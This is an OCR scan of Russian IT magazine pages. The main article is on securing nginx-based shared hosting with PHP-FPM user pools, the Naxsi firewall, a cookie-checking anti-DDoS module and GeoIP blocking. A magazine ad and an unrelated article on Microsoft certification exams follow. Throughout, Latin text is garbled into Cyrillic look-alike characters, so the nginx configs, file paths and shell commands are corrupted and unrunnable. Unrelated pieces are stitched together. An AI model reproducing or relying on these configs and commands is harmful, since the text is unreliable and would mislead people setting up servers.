зіІез-епаЫесІ/. Общая логика работы «админки» хостера следующая: 
при регистрации нового пользователя создается новый ОМІХ-юзер, 
принадлежащий группе ѵѵѵѵѵѵ-изегз, в пользовательском каталоге 
которого создаются подкаталоги ѵѵѵѵѵѵ и Іодз. Когда пользователь 
регистрирует новый домен, генерируется новый конфиг на основе 
приведенного шаблона, с заменой _Н05ТМАМЕ_ на имя домена. 




І4.ЧЫІ1 
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. ІЩі I» 
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! т ш* 
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Сравнение производительности пдіпх + РНР-РРМ и АрасЬе + тос1_рЬр 

а _115ЕРМАМЕ_ на имя пользователя (и пользовательского катало- 
га), и создается каталог для домена в подкаталоге ѵѵѵѵѵѵ пользова- 
теля. Полученный конфиг помещается в /ек/пдіпх/зіІез-епаЫесІ/, 
веб-серверу отдается команда перечитать конфиг. Как все это реа- 
лизовать, я рассказывать не буду, этим должны заниматься кодеры. 

В принципе, уже только этого (вкупе с ззЬ-сервером) хватит 
для нормального хостинга статических веб-сайтов, однако наши 
пользователи хотят получить еще и РНР с поддержкой Му50Е. Про- 
сто настроить вызов скриптов через встроенный модуль РазіСбІ 
нельзя, потому что в таком случае РНР-скрипты всех пользователей 
будут иметь одинаковые права и ошибка в одном скрипте приведет 
к компрометации всех остальных пользователей. Мы реализуем 
более сложную схему, в которой обработкой С61-запросов будет 
заниматься РНР-РРМ (РНР РазіССІ Ргосезз Мападег), а изоляция 
РНР-процессов одних пользователей от РНР-процессов других бу- 
дет выполнена с помощью механизма пулов. Первое, что необходимо 
сделать для реализации такой схемы, — это добавить в приведен- 
ный выше шаблон следующий блок (перед последней фигурной 
скобкой): 

# ѵі /е1:с/п§іпх/5І-1:е5-аѵа1іЫе/1:етр1а1:е 

1оса1;іоп ~ \.рІір$ { 

1:гу_1і1е5 $игі =404; 

■Ра5І;с§і_ра55 ипіх:/ѵаг/гип/рІір5--Ррт/_и5ЕКМАМЕ_.50ск; 

■Ра5І;с§і_іпсІех іпсіех.ріір; 

■Ра5І;с§і_рагат 5СКІРТ_РІІЕМАМЕ \ 

$сІоситеп1;_гоо1:$-Ра5І;с§і_5сгір1;_пате; 



■Ра5І:с2І_рагат РАІН_ІЯРО 

іпсіисіе /е1;с/п§іпх/-Ра5І;с§і_рагат5; 

} 

Это стандартный блок обработки ССІ-запросов с тем исключени- 
ем, что он передает запросы не стандартному обработчику, а в сокет 
/уаг/гип/рЬр5-фт/_и5ЕРМАМЕ_.50ск, который и будет слушать 
РНР-РРМ. Каждый пользователь в нашей конфигурации будет иметь 
собственный пул процессов РНР, конфигурируемый с помощью еще 
одного шаблона: 

# ѵі /е1:с/рІір5/-Ррт/1:етр1а1:е 

[Ц5ЕКМАМЕ] 



# Принимать за прос ы че р ез этот ІІЫІХ-сокет 
1І5І;еп = /ѵаг/ гип/рІір5--Рр п і/_и$ЕКМАМЕ_. зоск 



# Владелец сокета 

Іізііеп.оыпег = ІІ5ЕКМАМЕ 
1І5І:еп.^гоир = ыыы-изегз 
1І5І:еп.тосІе = 0600 



# Юзер и группа^ с правами котор ых бу дут исполняться 

# РНР-проиессы 

изег = Ц5ЕКМАМЕ 

§ГОир = ЫЫЫ-Ц5ѲГ5 



# Динамически регулировать количество дочерних процессов 

рш = сіупатіс 

# Максимальное количество процессов 

рт.шахсіііісігеп = 50 

# Количество процессов, порождаемых после старт а 

рш.5І:аг1: зегѵегз = 20 

# Минимальное и максимальное количество ожидающи)^ 

# процессов 

рт.тіп_5раге_5егѵег5 = 5 

рт.тах_5раге_5егѵег5 = 35 

Этот шаблон мы будем использовать для генерирования конфига 
пула для каждого пользователя. Другими словами, при регистра- 
ции нового пользователя наша админка теперь должна не только 



ВЕБ-ФАЙРВОЛ НА БАЗЕ М6ІМХ И МАХ5І 



Проект Махзі (Мдіпх Апіі Х55 501 Іщесііоп) представляет собой модуль 
ѴѴеЬ АррІісаПоп РігеѵѵаІІ для пдіпх, который позволяет защититься от 
большинства популярных атак, направленных на веб-сайты, — 501 
Іп]есІіоп5, Сго55 5і1е 5сгір1іпд, Сгозз 5і1е Редиезі Рогдегу, ІосаІ & 
Ретоіе Рііе Іпсіизіопз. В отличие от большинства подобных проектов, 
Махзі не опирается на сигнатуры, а использует более простую модель, 
в которой правила описывают не атаки, а неожиданные аргументы 
в НТТР-запросах. Каждый символ в таком запросе получает балл, 
и при превышении некоторого порога пользователь перенаправляется 
на страницу 404. Еще один плюс: правила не требуют постоянного 
обновления. Настройки позволяют защищать не весь сайт целиком, 
а лишь отдельные части. 

Разработки стартовали в июле 2011-го и ведутся в рамках боодіе 
Сосіе ( пахві.доооіесосіе.сот і. в сентябре того же года проект был взят 
под крыло 0ѴѴА5Р. Сегодня соответствующий пакет можно найти 
в репозиториях многих дистрибутивов Ріпих (в частности, ОеЬіап/ІІЬип- 
Іи) и в портах РгееВ50. Для установки из сырцов следует пересобрать 
пдіпх с новым модулем (--ас1сІ-тосІиІе=../пах5І-х.хх/пах5І_5гс, при этом 



пахзі должен быть указан первым). Для конфигурирования в секции 
Ыір следует подключить правила «іпсіисіе /еІс/пдіпх/пах5І_соге. 
гиіез», не забыв скопировать сам файл из архива в выбранное место. 
Далее в ІосаЫоп указываем адрес сайта и путь к файлу с настройками 
работы (в архиве есть пример сІе^аиІІ_ІосаІіоп_сопПд.ехатрІе). 

В этом файле, помимо прочего, указаны значения СИескРиІе для 
срабатывания блокировки. После этого Махзі начнет генерировать 
ѵѵЬіІеІізІ, состоящий из легальных запросов. По окончании обучения 
следует удалить директиву РеагпіпдМосІе и перевести Махзі в обычный 
режим (в РеагпіпдМосІе Махзі тоже блокирует неправильные запросы, 
но каждый раз проверяются все правила, что дополнительно нагружает 
систему). Теперь при появлении запроса выполняется подсчет баллов, 
и в случае превышения СИескКиІе запрос блокируется. Возможны 
и ложные срабатывания, когда блокируется вполне легитимный запрос, 
для таких случаев разработчики предлагают скрипт гиІез_депегаІог.ру, 
позволяющий анализировать логи и автоматически создавать ѴѴР. 

Сергей Яремчук (дгіпбегйзупаск.ги) 
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заводить нового ІІМІХ-пользователя и размещать в его домашнем 
каталоге набор подкаталогов, но и генерировать новый конфиг 
/ек/рЬр5Лрт/роо1.с1/ИМЯ_П0ЛЬ30ВАТЕЛЯ.соп^ и перезагружать 
РНР-РРМ командой /ек/ініЕсІ/рИрб-фт геіоасі. Все, теперь пользо- 
ватели могут создавать новые сайты и ставить на них ѴѴогсІргезз, 
РНРМуАсІппіп, ОгираІ и другой софт. Теперь займемся тюнингом пдіпх 
для обеспечения большей безопасности нашего веб-сервера и при- 
ложений пользователей. 



МОІМХИ 0002 



Чтобы обезопасить сервер и веб-сайты клиентов от всякого рода за- 
разы и хацкеров, необходимо принять ряд мер. Во-первых, следует 
применить некоторые настройки пдіпх, детально описанные в статье 
«Полный тюнинг движка» (][_07_2010). Во-вторых, мы должны обе- 
спечить хоть какую-то защиту от 00о5. Это гораздо более важно, 
чем все остальное, так как в случае с хостингом одна хорошая 00о5- 
атака сможет повалить не только веб-сайтжертвы, но и страницы 
всех остальных клиентов, что не очень хорошо скажется на репута- 
ции сервиса. Начальную защиту от разного рода 5УМ/АСК и ІЮР- 
флуда довольно просто реализовать с помощью іркЫез, о чем 
мы также уже не раз писали. Совсем другое дело — 00о5-атака, 
направленная на сам веб-сайт, то есть различные его страницы, 
которые при обработке запроса могут дать высокую нагрузку на сер- 
вер (НТТР-флуд). Опасность такой атаки заключается в, так сказать, 
«низком уровне вхождения». Если недоброжелатели смогут найти 
на веб-странице одного из наших клиентов действительно плохо 
написанный скрипт, который достаточно долго исполняется, по- 
требуется не так много ресурсов, чтобы завалить сайт многократным 
обращением к этой странице с помощью простейшего бота. Конечно, 
мы можем ограничить время исполнения скриптов в настройках са- 
мого РНР, а также установить еАссеІегакг для ускорения их работы 
(это необходимо сделать в любом случае), что позволит несколько 



снизить «планку вхождения», но не решит проблему полностью. 
Поэтому нам нужен блокиратор самих ботов. Ботов можно отлавли- 
вать, используя несколько косвенных признаков. Наиболее важные 
из них — это реализация функций, которые априори есть в браузере, 
но обычно не реализованы в 00о5-ботах по причине ненужности. 
Обычно программеры слишком ленивы, чтобы реализовать такую 
функциональность в ботах, поэтому 90% атак можно отбить, просто 
проверяя наличие поддержки соокіе, функции перенаправления 
и поддержки ОаѵаБсгірІ в НТТР-клиенте. 

Именно так действует модуль кзкоокіе-пдіпх-тосіиіе. Его за- 
дача — попытаться установить в клиенте случайно сгенерированный 
кукис, затем перенаправить клиента на тот же адрес с добавлением 
заранее заданного СЕТ-параметра и при переходе клиента на этот 
адрес проверить успешность установки соокіе. Если какой-то из 
этих шагов клиент выполнить не сможет, значит он либо не имеет 
поддержки соокіе, либо не умеет обрабатывать редиректы. В любом 
случае это будет свидетельствовать о наличии на другой стороне 
соединения бота, который будет отшиблен на заранее указанный ІІРЕ. 
Устанавливается модуль стандартным для пдіпх методом: пересборкой 
веб-сервера с поддержкой модуля. Сделать это можно так: 

$ зисіо ар1:-^е1: іпзііаіі ЬиіІсІ-еБзепІііаІ 

$ ссі /1:тр 

$ ы§е1; Іі1;1;р://§оо.§1/МІі7ІЗ 

$ ы§е1; Іі1;1;р://§оо.§1/§уѵ53 -О 1;е5І:-соокіе.1;аг.§2 
$ 1;аг -Х 2 -Р п§іпх-1.2.0.1;аг.§2 
$ 1;аг -Х 2 -Р 1;е5І:-соокіе.1:аг.§2 

$ ССІ п^іпх-1.2.Ѳ 

$ ./сопб^иге --рге1іх=/и5г/1оса1 \ 

--ас ІсІ-тосІи1е=кургІ2е1-1:е5І:соокіе-п§іп х-тосІи1е- * 

$ таке 

$ зисіо ар1;-§е1; гетоѵе п§іпх 




Принцип работы модуля пдіпх-іезісоокіе-тосіиіе (для ботов без поддержки ^аѵа5с^ір^ и с поддержкой ^аѵа5с^ір0 
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$ 5ЦСІ0 таке іп5І:а11 

Также установим стартовый скрипт пдіпх: 

$ с6 /1:тр 

$ ы§е1; Іі1;1;р://§оо.§1/Н08ВС 

$ ссі /е1:с/іпі1:.сі/ 

$ Бисіо 1:аг -хд-р /1;тр/п§іпх-іпі1;-иЬип1;и_ѵ1.2.1.1;аг.Ь22 

$ сіітосі +х п^іпх 

$ зисіо ирсіа1:е-гс.сі -Т п§іпх сІеТаиІІіБ 

Теперь, когда пдіпх работает, добавим опции модуля Іезкоокіе- 
пдіпх-тосіиіе в конфиг веб-сервера (секцию Ьир): 

# ѵі /еѣс/пбіпх/пбіпх.согтР 

ЬТТр { 

# По умолчанию мо дуль отключен 

1;еБІ:соокіе оп; 

# Имя соокіе для проверки 

1:еБІ:соокіе_папіе ВРС: 

# Строка , исп ол ьзуемая при генерировании соокіе 

1:еБІ: соокіе_Бесге1: кеершеБесгеІ:: 

# Сессионный ключ 

1:еБІ:соокіе_БеББІоп $гето1:е_ас1с1г ; 

# Имя (зЕТ-параметра для проверки соокіе 

1:еБІ:соо кіе_аг§ а1:1:етр1: : 

# Пытаться установить соокіе три раза 

1:еБІ:соокіе_тах_а1:1:етр1:Б 3; 

# Применять модуль только в отношении 6ЕТ- запросов 

1:еБІ:соокіе_^е1:_оп1у оп; 

} 

Так действие модуля будет автоматически распространяться 
на все сайты всех клиентов. Чтобы отключить его для выбранного 
сайта, достаточно просто добавить строку «кзкоокіе о1"Т’» в конфиг 
нужного виртуального хоста внутри /ек/пдіпх.сІ/5Ік5-епаЫесІ/ (не 
забываем, что после регистрации нового сайта в этот каталог будет 
помещен новый конфиг виртуального хоста, сгенерированный из 
шаблона). Это самый простой пример использования модуля. В фай- 
ле сІос/изесаБеБ.ІхІ ты найдешь пять примеров конфигов, начиная от 
наиболее простого, который применили мы, и заканчивая примером 
шифрования кукиса с помощью АЕ5-128 и его последующей дешиф- 
ровки на стороне клиента с помощью ^ауа5сгір^кода. Ни один бот 
не сможет пройти такой тест. 



ФИЛЬТРАЦИЯ ПО ГЕОГРАФИЧЕСКОМУ ПРИЗНАКУ 



Второй и более радикальный метод борьбы с 00о5 — это блокиро- 
вание клиентов по географическому признаку. Часто источник 00о5 
находится в тех частях света, с которых легальные юзеры никогда на 
сайт не заходят. Это значит, что некоторые типы атак можно отбить, 
просто блокируя ІР-адреса по географическому признаку. Конечно, 
каждый сайт будет иметь свой список легитимных источников тра- 
фика, поэтому данный метод борьбы стоит сделать опциональным 
и активировать по запросу клиента или после обнаружения атаки. 

Модуль, реализующий эту функциональность, называется деоір. 
Он включен в стандартную поставку пдіпх, поэтому устанавливать 
дополнительные пакеты не нужно. Однако чтобы он работал пра- 
вильно, придется загрузить базу блоков ІР-адресов и соответствую- 
щих им стран: 

$ ССІ /е1:с/п§іпх/ 

$ Бисіо ы§е1; Іі1:1:р://§оо.§1/Іі2В51лІ 

Теперь просто подключаем базу ІР-адресов в конфиге пдіпх 
(в секции Ьир): 

§еоір_соип1;гу /е1:с/п§іпх/соп-Р/СеоІР . сіа1: 

А в конфиг виртуального хоста нужного сайта добавляем следую- 
щую строку: 



і:^($§еоір_соип1;гу_сосIе = СМ) { 

геііигп 444; 

} 

Здесь СМ — это двухбуквенный код неугодной страны, в данном 
случае Китая, а 444 — код ответа веб-сервера. Не составит труда 
написать скрипт, который будет добавлять такие строки в нужные 
конфиги при выборе соответствующей опции через админку. Хотя 
принудительно блокировать ботнеты можно и вручную. 



выводы 



Использовать пдіпх в качестве веб-сервера для хостинга не только 
можно, но и нужно. В отличие от АрасЬе, он может обслужить го- 
раздо большее количество клиентов при минимальной нагрузке на 
систему. В сочетании с РНР-РРМ и анти-00о5 модулями ты сможешь 
создать защищенный и устойчивый к атакам сервер, который будет 
работать годами, не требуя дополнительных расходов на сопрово- 
ждение. 



РЕАЛИЗАЦИЯ МЕХАНИЗМА ДИНАМИЧЕСКОГО СОЗДАНИЯ 
ВИРТУАЛЬНЫХ ХОСТОВ 



Если ты не собираешься поднимать полноценный хостинг, 
а лишьхочешь получить простой механизм быстрого создания 
виртуальных хостов, можешь воспользоваться следующим 
конфигом виртуального хоста: 

# ѵі /еіс/пёіпх/БііеБ-епаЫесІ/сІе-РаиІ-І: 

Бегѵег 

{ 

і-р ($ІіОБІ: 

{ 

БѲІ: $ІіоБІ:_ѵ\/і1:Ііои1;_ыыы $1; 

геыгіііе ^(.*)$ Іі1:1:р://$ІіоБІ:_ыі1:Ііои1:_ыыы$1/ регтапепі;; 

} 



Бегѵег_пате_іп_гесіігес1; о-р-р; 

1ІБІ;еп 80; 

Бегѵег пате 

ассеББ_1о§ /ѵаг/1о§/п§іпх/$ІіоБІ;.ассеББ_1о§ таіп; 
еггог_1о§ /ѵаг/1о§/п§іпх/1о§Б/$ІіоБІ;.ассеББ_1о§ іп-Ро; 

ГООІ: /ѵаг/ѵ\ДлДл//$ІіоБІ: : 

} 

Этот конфиг позволяет динамически создавать новые 
виртуальные хосты простым созданием каталога в /ѵаг/ѵѵѵѵѵѵ/. 
Чтобы добавить новый виртуальный хост, просто выполни 
команду тксііг/ѵаг/ѵѵѵѵѵѵ/ехетріе.сот, и новый виртуальный 
хост сразу начнет функционировать. 



ІѴІѴІѴІ 

• ЬаЬгаИаЬг.ги/ 
Р05І/139931/ — 
авторское описание 
модуля Іезісоокіе- 
пдіпх-тосіиіе на 
русском языке. 

• ЬаЬгаИаЬг.ги/ 
Р05І/141989/— 
установка соокіе 
через РІазЬ. 



ШЯМІМС 



Не забывай 
перезапускать пдіпх 
после каждой правки 
конфигов. 
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у ЖУРНАЛ# 

ШРооІМІ 

ТОТАЛЬНО 
О ФУТБОЛЕ 




МАРАТ 

ИЗМАЙЛОВ 

НАЧИСТОТУ 



ВАН НИСТЕЛРОЙ / ПЕРМАНИР / 



/МИЛАН /БАРСЕ 



ЖЕКІНОІ 



КОПЛИ 

ГЛУБЖЕ 

ДОНЕЦКИЙ «ШАХТЕР# 
И ЕГО СЕКРЕТЫ 



БЕЛОРУСЫ 



^ ноим1Т5 

МЙНн 



РОНА/^У 



НОВЫЙ НОМЕР В МАГАЗИНАХ 
ТВОЕГО ГОРОДА 




5УМ/АСК 



Илья Рудь (ігисігаііѵе.ги) 




соответ с твия 



КАК СДАВАТЬ 

СЕРТИФИКАЦИЮ 

МІСК050РТ 

Твоему вниманию предлагается небольшой РАО 
по сертификации самого крупного софтверного 
вендора, приправленный субъективным 
мнением человека, который сдал не один 
экзамен и последние пять лет работает в сфере 
образования и сертификации. 
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Знак соответствия 



что ТАКОЕ СЕРТИФИКАЦИЯ? 



Сертификация — это всегда раздача вендором «погон» в обмен на 
демонстрацию знаний специалистом. Причем на текущий момент 
сертификацию МісгозоЙ можно разделить на две категории. 
Первая категория — премиум-класс (статусы МСМ/МСА) — при- 
сваивается, как правило, после дорогостоящего обучения за 
рубежом и сдачи как теоретических, так и практических экзаме- 
нов. Получить ее самостоятельно действительно тяжело и дорого, 
но взамен ты приобретаешь статус специалиста экстра-класса 
и вход в группу нескольких десятков спецов на всю Россию. Вторая 
категория — это сертификация пехоты (статусы МСТ5/МСІТР). Для 
получения статусов не требуется обучение, и при желании даже 
без знаний в течение месяца-двух можно сертифицироваться под 
завязку. Почему сложилась такая ситуация, объясню позже. 



ЗАЧЕМ СЕРТИФИКАЦИЯ НУЖНА? 



Давай посмотрим, зачем сертификация нужна вендору, работо- 
дателю и сотруднику. У вендора все просто: для него сертифи- 
кация — это система распознавания «свой — чужой» и способ 
продвижения собственного товара в массы. Люди так устрое- 
ны, что любят всевозможные значки и нашивки, позволяющие 
выделиться. Вендор, с одной стороны, получает более-менее 
верное представление о наличии специалистов в своей области, 
с другой — завязывает людей на своей продукции, теша самолю- 
бие специалистов красивыми грамотами. Этакие значки для юных 
рейнджеров. 

Будем честны: работодателю сертификация сотрудника, как 
правило, нужна для поддержания статусов партнерства с вендо- 
ром или для получения новых «нашивок» опять же от вендора. Хотя 
нередки ситуации, когда при участии в тендерах определяются 
условия на сертификацию сотрудников, чтобы хоть как-то застра- 
ховаться от выполнения работы совсем некомпетентными сотруд- 
никами. С другой стороны, мало кто любит пассивных работников, 
не стремящихся к развитию, и наличие сертификации в данном 
случае показатель того, что человек на месте не стоит. 

Специалист всегда старается себя продать, и обычно про- 
дажа начинается с резюме. Ты можешь быть супергуру, но дело 
не дойдет даже до собеседования, если у тебя нет красивого 
резюме. Что в нем важно? Показать образование, опыт и желание 
расти и развиваться. Наличие в разделе «Образование» курсов 
повышения квалификации и сертификаций — сигнал о том, что 
человек не остановился на институтской базе и постоянно со- 
вершенствуется. 




ТЫ МОЖЕШЬ БЫТЬ 
СУПЕРГУРУ, НО ДЕЛО 
НЕ ДОЙДЕТ ДАЖЕ ДО 
СОБЕСЕДОВАНИЯ, ЕСЛИ У ТЕБЯ 
НЕТ КРАСИВОГО РЕЗЮМЕ 



КАК ПРОХОДИТ ЭКЗАМЕН? 



Если мы говорим о сертификациях МСТ5/МСІТР, то процедура очень 
простая. Ты звонишь в центр тестирования Рготеігіс (через эту ком- 
панию осуществляется сертификация большинства ИТ-вендоров) 
и выбираешь свободный день и время. Приходишь за десять минут 
до назначенного времени и оформляешься. При себе необходимо 
иметь два документа, например паспорт и заграничный паспорт 
(список возможных документов большой). Если регистрироваться на 
сайте Рготеігіс, а потом уведомлять центр тестирования о желании 
сдать в определенную дату, то можно сэкономить 500-600 рублей на 
одном экзамене. 

После оформления отдаешь часы, телефоны, жучки и идешь за 
компьютер. Тебе подгружают нужный экзамен, после чего остав- 
ляют в компании таких же сдающих, которые сидят за перегород- 
кой. Суть экзамена в ответах на вопросы. На экране появляются 
поочередно вопросы и варианты ответов, а ты должен выбрать 
один или несколько правильных ответов. Ответив на все вопросы, 
получаешь кнопку РіпізЬ. После чего на принтер у администратора 
центра выводится страница с твоим результатом. 



сколько ВРЕМЕНИ ДАЕТСЯ НА ЭКЗАМЕН? 



Зависит от экзамена, но как правило, около трех часов. Время за- 
пускается вместе со стартом экзамена и уже не останавливается, 
так что, если ты будешь задумчиво смотреть в потолок или на час 
уйдешь в туалет, экзамен тебя ждать не станет. 



сколько ВОПРОСОВ в ЭКЗАМЕНЕ? 



Опять же по-разному, в среднем около пятидесяти вопросов на 
экзамен. Если поделить время экзамена на количество вопросов. 




Сертификаты МісгозоН 
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Страничка Википедии, посвященная сертификации специалистов МісговоН 

ТО получается три — три с половиной минуты на вопрос. Когда ты 
нормально подготовился, этого более чем достаточно. Я сдавал 
около пятнадцати экзаменов, и ни разу время не заканчивалось, 
всегда еще оставалось минут тридцать-сорок. 



что ПРЕДСТАВЛЯЮТ СОБОЙ ВОПРОСЫ? 



Большинство заданий — это текст из шести-семи предложений 
и сам вопрос. В качестве возможных ответов дается от четырех до 
семи вариантов, из которых нужно выбрать либо один, либо два, 
либо сколько захочешь. В вопросе могут звучать фразы «выберите 
один вариант», «выберите два варианта», «выберите все воз- 
можные варианты», что дает небольшую подсказку. При этом в тех 
вопросах, где несколько правильных ответов, добавляется, что 
ответы — либо часть одного решения, либо различные варианты 
одного действия. 



НАСКОЛЬКО СЛОЖНЫЕ ВОПРОСЫ? 



у М іеговой был период откровенно легких для специалиста вопро- 
сов. Например, у человека, который обновляет МС5Е, спрашивали, 
как прописать путь сервера обновлений на клиенте ѴѴ51І5. Или 
человеку, который никогда не настраивал МАР и был знаком с ним 
только по маркетинговым презентациям МіегозоЙ, удавалось 
ответить на 90% вопросов по этой теме. Более того, сама подбор- 
ка вариантов ответов просто поражала. Многие ли из читателей 
знают автора музыки балета «Жизель»? Я думаю, нет. А если в ва- 
риантах ответов встретится: А) Михаэль Шумахер; Б) Борис Ельцин; 
В) Адольф Адан; Г) Василий Теркин? Думаю, все будет очевидно. 

К радости тех, кто за честную игру, сейчас ситуация несколько ис- 
правилась: и вопросы повеселей, и откровенно дурацкие варианты 
ответов нечасто встречаются. Скажем так, если ты готовился, 
учился, читал документацию, то твой шанс на успешную сдачу 
очень велик. Имей в виду, что на экзамене спрашивается все, что 
заявлено в программе экзамена, и иногда даже больше. Охват тем 
очень большой. И если ты не разбирал тему, думая, что это мертвая 
«фича» и никому не нужно, то будь готов получить четыре-пять во- 
просов по ней и значительно уменьшить свой шанс на сдачу. 



КАКОЙ ПРОХОДНОЙ БАЛЛ НА ЭКЗАМЕНЕ? 



У экзаменов МіегозоЙ 1000-балльная система с проходным бал- 
лом 700. Получается, что из четырех вопросов на три ты должен 
отвечать правильно. Очень спокойная, без перегибов схема, на- 
правленная на то, чтобы сдавал хороший процент претендентов. 
Сколько баллов дают за каждый вопрос и равное ли распределе- 
ние баллов между вопросами, тебе никто не скажет, поэтому голову 
себе этим не забивай. 



НА КАКОМ ЯЗЫКЕ МОЖНО СДАВАТЬ ЭКЗАМЕНЫ? 



Большая часть экзаменов доступна только на английском языке, 
но встречаются экзамены и на русском. Я не рекомендую выби- 
рать родной язык. Во-первых, из-за качества перевода, который 




Учебные курсы по продуктам МіегозоМ 

требует еще одного «перевода» с плохого русского на обычный 
русский. Бояться английского языка не стоит. Все предложения 
в вопросах — это Ргезепі 5ітрІе с использованием пары сотен 
слов. Во-вторых, лично я работаю с подавляющим большинством 
английских версий, и вспоминать, как и что называется в русском 
продукте, совсем не хочется. 



кто ТАКИЕ ДАМПЕРЫ И ПОЧЕМУ 

ОНИ МЕШАЮТ ЧЕСТНЫМ СПЕЦИАЛИСТАМ? 



Как я уже сказал, экзамен состоит примерно из пятидесяти вопро- 
сов. При условии, что технический текст на английском языке я 
читаю примерно с такой же скоростью, как на родном, на каждый 
вопрос уходит сорок — шестьдесят секунд. Этого хватает, чтобы 
прочитать текст и быстро принять решение. Даже при такой «бы- 
строй» математике экзамен должен занимать не менее пятидесяти 
минут. Естественно, если ты не знаешь точный ответ и сомнева- 
ешься, перебирая варианты, ни о каких шестидесяти секундах на 
вопрос речи не идет. 

Поверь, людей, которые «прощелкивают» экзамен за пятнадцать 
минут и делают это успешно, не так уж мало. Реактивные мальчи- 
ки не уникумы, а обычные дамперы, заучившие ответы заранее. 
Центров приема экзаменов достаточно много, из них фотографии 
экранов с вопросами утекают в интернет, а потом решения продают- 
ся или просто раздаются в Сети. Выходит, что достаточно потратить 
день, заучив ответы на сотню-другую вопросов, и получить статус 
без проблем. К сожалению, от чтения дампа знаний не прибавля- 
ется, и, попав на реальное собеседование, такой «специалист» 
опозорится, оставив дурное впечатление у работодателя. После 
чего работодатель вполне резонно будет считать, что статус МС5Е 
— «полное фуфло». Есть ли выход? Да — экзамен должен на 80% 
состоять из симуляций. Симуляция — это мини лабораторная работа, 
где для ответа на вопрос тебе нужно что-то сделать. «Задампить» 
симуляцию гораздо сложнее, да и зазубрить тоже. Стоимость 
реализации такой схемы несколько выше, МіегозоЙ попыталась 
приживить симуляции году так в 2006-м, но впоследствии от них 
отказалась. 



КАК готовиться к ЭКЗАМЕНУ? 



У каждого экзамена есть своя страница (например, страни- 
ца экзамена 70-662: ѵѵѵѵѵѵ.ппісгозоЙ.сопп/Іеагпіпд/еп/из/ехапп. 
азрх?ісІ=70-662 ). На ней ты можешь узнать темы и процент вопросов 
по каждой теме в экзамене. Теперь, когда программа ясна, у тебя 
три пути. 

1. Дорогой и быстрый. Ты идешь на курс, на котором раскрывается 
тема экзамена, и пять дней усердно работаешь. Не опаздываешь, 
делаешь все лабораторные работы, слушаешь инструктора, зада- 
ешь вопросы, когда непонятно, и так далее. После курса два-три 
дня отдыхаешь. Далее берешь тест Меазиге ир по нужному курсу 
и решаешь его. Глядя на темы, в которых ты делаешь ошибки, 
можно будет понять, на каких занятиях ты все-таки заснул или 
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Знак соответствия 



какие темы инструктор пропустил. Далее берешь учебник по курсу 
(МОС) и любые внешние источники знаний. Собираешь вирту- 
альный стенд и по всем «заваленным» темам делаешь вычитку 
и тестирование. Допустим, ты не ответил на вопросы по Васкир/ 
Резіоге ЕхсЬапде. Значит, на стенде поочередно отрабатываешь 
все сценарии (восстановление писем, восстановление ящика, 
восстановление сервера, ОіаІ Топе восстановление и так далее). 
Если ты честно отработаешь каждую тему, где сделал ошибку, то 
проблем на экзамене не будет. Я не сторонник сдачи экзамена 
в последний день курса, я за то, чтобы информация осела в голове 
и человек шел на экзамен с полной уверенностью в успехе (лучше 
день потерять и за пять минут долететь). Итого на практически 
100%-ю сдачу по такому сценарию уйдет до трех недель. 

2. Более дешевый и более медленный. Ты достаешь МСТ8 ЗеІІ^ 
Расеб Тгаіпіпд К\\ по интересующему тебя экзамену и готовишь 
хороший стенд, чтобы на нем можно было запустить четыре-пять 
виртуальных машин, желательно с приложениями а-ля ЕхсЬапде, 
ЗЬагеРоіпЕ То есть современный процессор, минимум 16 Гб 
оперативной памяти и шустрый РАЮ-массив. Зеіі" Расеб Тгаіпіпд 
К\{ — не идеальная литература, но у нее есть большой плюс: она 
именно ЗеІІ" Расеб — для самостоятельного изучения и подготов- 
ки к экзамену. У большинства Тгаіпіпд К\\ нет русского перевода, 
поэтому читать придется на языке Шекспира. Для нормального 
чтения техлитературы знаний особо не нужно, но словарный 
запас хотя бы в 800-1500 слов должен быть. Далее все зависит от 
целеустремленности и усидчивости. В свое время в таком режиме 
я готовился к МС5Е. На каждый экзамен уходило около трех меся- 
цев, а сам статус был получен где-то за два года. Естественно, это 
подготовка без отрыва от работы в любое свободное время. 

3. Самый дешевый и самый быстрый. Дампы... Дампы... Дампы... 
Три дня — и ты сертифицирован. Толку, правда, ноль, на первом 
же грамотном собеседовании тебя быстро вернут с небес на 
землю и покажут направление выхода. Ну а деньги за номи- 
нальное владение статусами никогда не платили, все работода- 
тели — звери. Хотят, чтобы сотрудник реально что-то умел. Мое 
мнение: этот путь — тупиковый. 




САМОЕ ГЛАВНОЕ — НЕ 
ВОЛНОВАТЬСЯ. МАКСИМУМ, 
ЧТО ТЫ ТЕРЯЕШЬ, — ЭТО 
80 ДОЛЛАРОВ И КАПЛЮ 
САМОЛЮБИЯ 



КАК ВЕСТИ СЕБЯ НА ЭКЗАМЕНЕ? 



Самое главное — не волноваться. Максимум, что ты теряешь, — это 
80 долларов и каплю самолюбия. Один и тотже экзамен можно 
сдавать многократно, отудачи или неудачи ничего прямо сейчас 
не решится, поэтому волнение можно отбросить. Если ты прореши- 
вал Меазиге ир, то ничего нового на экзамене ты не увидишь — те 
же темы, тотже стиль вопросов. 

Не спеши на экзамене. Поверь стреляному воробью, времени 
у тебя более чем достаточно для того, чтобы спокойно читать, спо- 
койно размышлять и правильно отвечать на вопросы. По послед- 
ним правилам часы у тебя заберут, поэтому и переживать не стоит, 
на внутреннем таймере также внимание заострять не надо. 

Понимай логику вендора. Я уже говорил, что на определенный 
процент вопросов можно ответить исходя из банальной логи- 
ки. Если экзамен по ЕхсЬапде 2010, то, уж поверь, в правильных 
ответах не будет названий средств сторонних производителей 
и для ответа не нужно знать, как настраивается ЕоШз. Если среди 
вариантов ответов несколько корректных (такое бывает), но только 
в одном название новой фичи продукта, то с очень высокой долей 
вероятности именно это и хочет услышать вендор. В таких вопро- 
сах обычно звучат фразы «укажите наиболее удобный / опти- 
мальный способ чего-нибудь». Конечно, чтение логики вендора 
приходит с опытом, но все же стоит это учитывать. 

Первое мнение самое верное. Разумеется, это субъективно, 
но я придерживаюсь точки зрения, что самый первый ответ, кото- 
рый пришел в голову, и есть верный. Могу по пальцам посчитать 
случаи, когда менял ответ после выбора. Тогда я просто пропускал 
какое-то важное условие, которое в корне все меняло. Никогда не 
перечитываю вопросы и ответы в конце экзамена, чего и тебе же- 
лаю. Если не ответил сразу на чистую голову, значит не ответишь 
и через два часа на уставшую. 

Пропускай завальные вопросы. Иногда читаешь вопрос, 
и в голове одна только мысль — «это вообще о чем?». То есть еще 
на этапе чтения ты видишь, что ответить не сможешь и даже вы- 
брать что-то логичное по ответам сложно. Не теряй время, помечай 
вопрос (так можно) и двигайся дальше. В самом конце вернешься 
к помеченным вопросам и в крайнем случае погадаешь на кофей- 
ной гуще. 



